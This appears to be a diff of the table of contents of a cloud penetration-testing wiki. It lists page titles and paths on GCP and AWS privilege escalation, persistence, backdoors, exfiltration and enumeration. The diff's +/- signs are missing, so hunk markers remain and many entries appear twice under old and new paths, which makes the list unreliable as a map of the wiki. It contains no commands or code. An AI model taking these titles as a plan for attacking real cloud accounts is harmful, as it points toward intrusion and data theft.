- [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md)
- [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md)
- [GCP - BigQuery Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md)
- [GCP - Bigtable Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigtable-privesc.md)
- [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md)
- [GCP - Cloud Workstations Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md)
- [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md)
- [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md)
- [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md)
@@ -125,11 +118,9 @@
- [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)
- [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md)
- [GCP - Dataproc Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md)
- [GCP - Dataflow Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md)
- [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md)
- [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md)
- [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md)
- [GCP - Firebase Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md)
- [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md)
- [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md)
- [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md)
@@ -138,7 +129,6 @@
- [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md)
- [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md)
- [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md)
- [GCP - Vertex AI Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md)
- [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md)
- [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md)
- [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md)
@@ -148,7 +138,6 @@
- [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md)
- [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md)
- [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md)
- [GCP - Bigtable Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigtable-persistence.md)
- [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md)
- [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md)
- [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md)
@@ -179,7 +168,6 @@
- [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
- [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
- [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
- [GCP - Dataflow Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md)
- [GCP - Dataproc Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md)
- [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
- [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
@@ -197,7 +185,6 @@
- [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md)
- [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md)
- [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md)
- [GCP - Vertex AI Enum](pentesting-cloud/gcp-security/gcp-services/gcp-vertex-ai-enum.md)
- [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md)
- [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md)
- [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md)
@@ -229,142 +216,109 @@
- [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md)
- [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md)
- [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md)
- [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence/README.md)
- [AWS - Cloudformation Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence/README.md)
- [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence/README.md)
- [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence/README.md)
- [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence/README.md)
- [AWS - EC2 ReplaceRootVolume Task (Stealth Backdoor / Persistence)](pentesting-cloud/aws-security/aws-persistence/aws-ec2-replace-root-volume-persistence/README.md)
- [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence/README.md)
- [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence/README.md)
- [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence/README.md)
- [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence/README.md)
- [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence/README.md)
- [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence/README.md)
- [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md)
- [AWS - Cloudformation Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.md)
- [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md)
- [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md)
- [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md)
- [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md)
- [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md)
- [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md)
- [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md)
- [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md)
- [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md)
- [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md)
- [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md)
- [AWS - Lambda Alias Version Policy Backdoor](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-alias-version-policy-backdoor.md)
- [AWS - Lambda Async Self Loop Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-async-self-loop-persistence.md)
- [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md)
- [AWS - Lambda Exec Wrapper Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-exec-wrapper-persistence.md)
- [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence/README.md)
- [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence/README.md)
- [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence/README.md)
- [Aws Sagemaker Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence/README.md)
- [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence/README.md)
- [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence/README.md)
- [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence/README.md)
- [AWS - SQS DLQ Backdoor Persistence via RedrivePolicy/RedriveAllowPolicy](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence/aws-sqs-dlq-backdoor-persistence.md)
- [AWS - SQS OrgID Policy Backdoor](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence/aws-sqs-orgid-policy-backdoor.md)
- [AWS - SSM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence/README.md)
- [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence/README.md)
- [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence/README.md)
- [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md)
- [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md)
- [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md)
- [Aws Sagemaker Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md)
- [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md)
- [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md)
- [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md)
- [AWS - SSM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.md)
- [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md)
- [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md)
- [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md)
- [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation/README.md)
- [AWS - Bedrock Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-bedrock-post-exploitation/README.md)
- [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation/README.md)
- [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md)
- [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md)
- [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md)
- [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md)
- [AWS CodeBuild - Untrusted PR Webhook Bypass (CodeBreach-style)](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-untrusted-pr-webhook-bypass.md)
- [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation/README.md)
- [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation/README.md)
- [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation/README.md)
- [AWS - EC2, EBS, SSM & VPC Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md)
- [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md)
- [AWS Covert Disk Exfiltration via AMI Store-to-S3 (CreateStoreImageTask)](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ami-store-s3-exfiltration.md)
- [AWS - Live Data Theft via EBS Multi-Attach](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-multi-attach-data-theft.md)
- [AWS - EC2 Instance Connect Endpoint backdoor + ephemeral SSH key injection](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ec2-instance-connect-endpoint-backdoor.md)
- [AWS EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-eni-secondary-ip-hijack.md)
- [AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-eip-hijack-impersonation.md)
- [AWS - Security Group Backdoor via Managed Prefix Lists](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-managed-prefix-list-backdoor.md)
- [AWS Egress Bypass from Isolated Subnets via VPC Endpoints](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-vpc-endpoint-egress-bypass.md)
- [AWS - VPC Flow Logs Cross-Account Exfiltration to S3](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-vpc-flow-logs-cross-account-exfiltration.md)
- [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md)
- [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation/README.md)
- [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation/README.md)
- [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation/README.md)
- [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation/README.md)
- [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation/README.md)
- [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation/README.md)
- [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation/README.md)
- [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md)
- [AWS - Lambda EFS Mount Injection](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-efs-mount-injection.md)
- [AWS - Lambda Event Source Mapping Hijack](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-event-source-mapping-hijack.md)
- [AWS - Lambda Function URL Public Exposure](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-function-url-public-exposure.md)
- [AWS - Lambda LoggingConfig Redirection](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-loggingconfig-redirection.md)
- [AWS - Lambda Runtime Pinning Abuse](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-runtime-pinning-abuse.md)
- [AWS - Lambda Steal Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md)
- [AWS - Lambda VPC Egress Bypass](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-vpc-egress-bypass.md)
- [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation/README.md)
- [AWS - MWAA Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-mwaa-post-exploitation/README.md)
- [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation/README.md)
- [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md)
- [AWS - SageMaker Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/README.md)
- [Feature Store Poisoning](pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md)
- [AWS - S3 Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation/README.md)
- [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation/README.md)
- [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation/README.md)
- [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/README.md)
- [AWS - SNS Message Data Protection Bypass via Policy Downgrade](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-data-protection-bypass.md)
- [SNS FIFO Archive Replay Exfiltration via Attacker SQS FIFO Subscription](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-fifo-replay-exfil.md)
- [AWS - SNS to Kinesis Firehose Exfiltration (Fanout to S3)](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-firehose-exfil.md)
- [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/README.md)
- [AWS SQS DLQ Redrive Exfiltration via StartMessageMoveTask](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md)
- [AWS SQS Cross-/Same-Account Injection via SNS Subscription + Queue Policy](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/aws-sqs-sns-injection.md)
- [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation/README.md)
- [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation/README.md)
- [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation/README.md)
- [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation/README.md)
- [AWS - WorkMail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-workmail-post-exploitation/README.md)
- [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md)
- [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc/README.md)
- [AWS - AppRunner Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc/README.md)
- [AWS - Bedrock Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md)
- [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc/README.md)
- [AWS - CloudFront](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudfront-privesc/README.md)
- [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc/README.md)
- [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc/README.md)
- [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md)
- [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md)
- [iam:PassRole, codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md)
- [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md)
  - [iam:PassRole, cloudformation:CreateStack, and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md)
- [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc/README.md)
- [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc/README.md)
- [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc/README.md)
- [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc/README.md)
- [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc/README.md)
- [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc/README.md)
- [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc/README.md)
- [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc/README.md)
- [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc/README.md)
- [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc/README.md)
- [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc/README.md)
- [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc/README.md)
- [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift/README.md)
- [AWS - Glue Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc/README.md)
- [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md)
- [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc/README.md)
- [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc/README.md)
- [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc/README.md)
- [AWS - Macie Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc/README.md)
- [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc/README.md)
- [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc/README.md)
- [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc/README.md)
- [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc/README.md)
- [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc/README.md)
- [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer/README.md)
- [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc/README.md)
- [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc/README.md)
- [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc/README.md)
- [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc/README.md)
- [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc/README.md)
- [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md)
- [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc/README.md)
- [AWS - SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md)
- [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc/README.md)
- [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc/README.md)
- [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc/README.md)
- [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md)
- [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md)
- [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md)
- [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md)
- [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md)
- [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md)
- [AWS - Bedrock Enum](pentesting-cloud/aws-security/aws-services/aws-bedrock-enum.md)
- [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md)
- [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md)
- [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md)
- [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md)
- [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md)
- [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md)
- [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum/README.md)
- [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md)
- [AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md)
- [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md)
- [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md)
- [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md)
- [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md)
- [AWS - SageMaker Enum](pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md)
- [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md)
- [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md)
- [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md)
- [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md)
- [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md)
- [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md)
- [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum/README.md)
- [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum/README.md)
- [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum/README.md)
- [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum/README.md)
